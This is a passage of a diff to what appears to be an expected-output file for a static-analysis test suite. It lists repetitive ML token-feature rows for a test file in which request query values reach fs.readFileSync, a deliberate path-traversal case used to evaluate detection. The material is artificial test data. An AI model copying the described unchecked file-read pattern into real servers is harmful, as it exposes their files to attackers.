fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | fs.read ... j.sub3) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | fs.read ... j.sub3) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:26:6:26:17 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:26:6:26:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:26:6:26:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:26:6:26:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:26:6:26:17 | readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:21 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:21 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:21 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:21 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:21 | obj | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:26 | obj.sub3 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:26 | obj.sub3 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:26 | obj.sub3 | calleeImports | fs | @@ -10551,6 +83767,67 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:26 | obj.sub3 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:26 | obj.sub3 | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:26:19:26:26 | obj.sub3 | receiverName | fs | +| autogenerated/TaintedPath/tainted-access-paths.js:26:23:26:26 | sub3 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:26:23:26:26 | sub3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:26:23:26:26 | sub3 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:26:23:26:26 | sub3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:26:23:26:26 | sub3 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:5 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:5 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:5 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:5 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:5 | obj | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:10 | obj.sub4 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:10 | obj.sub4 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:10 | obj.sub4 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:10 | obj.sub4 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:28:10 | obj.sub4 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:31:31 | obj.sub ... j.sub4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:31:31 | obj.sub ... j.sub4) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:31:31 | obj.sub ... j.sub4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:31:31 | obj.sub ... j.sub4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:28:3:31:31 | obj.sub ... j.sub4) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:28:7:28:10 | sub4 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:28:7:28:10 | sub4 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:28:7:28:10 | sub4 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:28:7:28:10 | sub4 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:28:7:28:10 | sub4 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:6 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:6 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:6 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:6 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:19 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:19 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:19 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:19 | fs.readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | exceptional return of fs.read ... j.sub4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | exceptional return of fs.read ... j.sub4) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | exceptional return of fs.read ... j.sub4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | exceptional return of fs.read ... j.sub4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | exceptional return of fs.read ... j.sub4) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | fs.read ... j.sub4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | fs.read ... j.sub4) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | fs.read ... j.sub4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | fs.read ... j.sub4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:29:29 | fs.read ... j.sub4) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:31:31 | fs.read ... j.sub4) | assignedToPropName | sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:31:31 | fs.read ... j.sub4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:31:31 | fs.read ... j.sub4) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:31:31 | fs.read ... j.sub4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:31:31 | fs.read ... j.sub4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:29:5:31:31 | fs.read ... j.sub4) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:29:8:29:19 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:29:8:29:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:29:8:29:19 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:29:8:29:19 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:29:8:29:19 | readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:23 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:23 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:23 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:23 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:23 | obj | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:28 | obj.sub4 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:28 | obj.sub4 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:28 | obj.sub4 | calleeImports | fs | @@ -10560,6 +83837,41 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:28 | obj.sub4 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:28 | obj.sub4 | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:29:21:29:28 | obj.sub4 | receiverName | fs | +| autogenerated/TaintedPath/tainted-access-paths.js:29:25:29:28 | sub4 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:29:25:29:28 | sub4 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:29:25:29:28 | sub4 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:29:25:29:28 | sub4 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:29:25:29:28 | sub4 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:8 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:8 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:8 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:8 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:8 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:21 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:21 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:21 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:21 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:21 | fs.readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | exceptional return of fs.read ... j.sub4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | exceptional return of fs.read ... j.sub4) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | exceptional return of fs.read ... j.sub4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | exceptional return of fs.read ... j.sub4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | exceptional return of fs.read ... j.sub4) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | fs.read ... j.sub4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | fs.read ... j.sub4) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | fs.read ... j.sub4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | fs.read ... j.sub4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:30:7:30:31 | fs.read ... j.sub4) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:30:10:30:21 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:30:10:30:21 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:30:10:30:21 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:30:10:30:21 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:30:10:30:21 | readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:25 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:25 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:25 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:25 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:25 | obj | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:30 | obj.sub4 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:30 | obj.sub4 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:30 | obj.sub4 | calleeImports | fs | @@ -10569,6 +83881,41 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:30 | obj.sub4 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:30 | obj.sub4 | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:30:23:30:30 | obj.sub4 | receiverName | fs | +| autogenerated/TaintedPath/tainted-access-paths.js:30:27:30:30 | sub4 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:30:27:30:30 | sub4 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:30:27:30:30 | sub4 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:30:27:30:30 | sub4 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:30:27:30:30 | sub4 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:8 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:8 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:8 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:8 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:8 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:21 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:21 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:21 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:21 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:21 | fs.readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | exceptional return of fs.read ... j.sub4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | exceptional return of fs.read ... j.sub4) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | exceptional return of fs.read ... j.sub4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | exceptional return of fs.read ... j.sub4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | exceptional return of fs.read ... j.sub4) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | fs.read ... j.sub4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | fs.read ... j.sub4) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | fs.read ... j.sub4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | fs.read ... j.sub4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:31:7:31:31 | fs.read ... j.sub4) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:31:10:31:21 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:31:10:31:21 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:31:10:31:21 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:31:10:31:21 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:31:10:31:21 | readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:25 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:25 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:25 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:25 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:25 | obj | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:30 | obj.sub4 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:30 | obj.sub4 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:30 | obj.sub4 | calleeImports | fs | @@ -10578,12 +83925,100 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:30 | obj.sub4 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:30 | obj.sub4 | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:31:23:31:30 | obj.sub4 | receiverName | fs | +| autogenerated/TaintedPath/tainted-access-paths.js:31:27:31:30 | sub4 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:31:27:31:30 | sub4 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:31:27:31:30 | sub4 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:31:27:31:30 | sub4 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:31:27:31:30 | sub4 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:6 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:6 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:6 | server | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:13 | server.listen | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:13 | server.listen | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:13 | server.listen | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:15 | exceptional return of server.listen() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:15 | exceptional return of server.listen() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:34:1:34:15 | 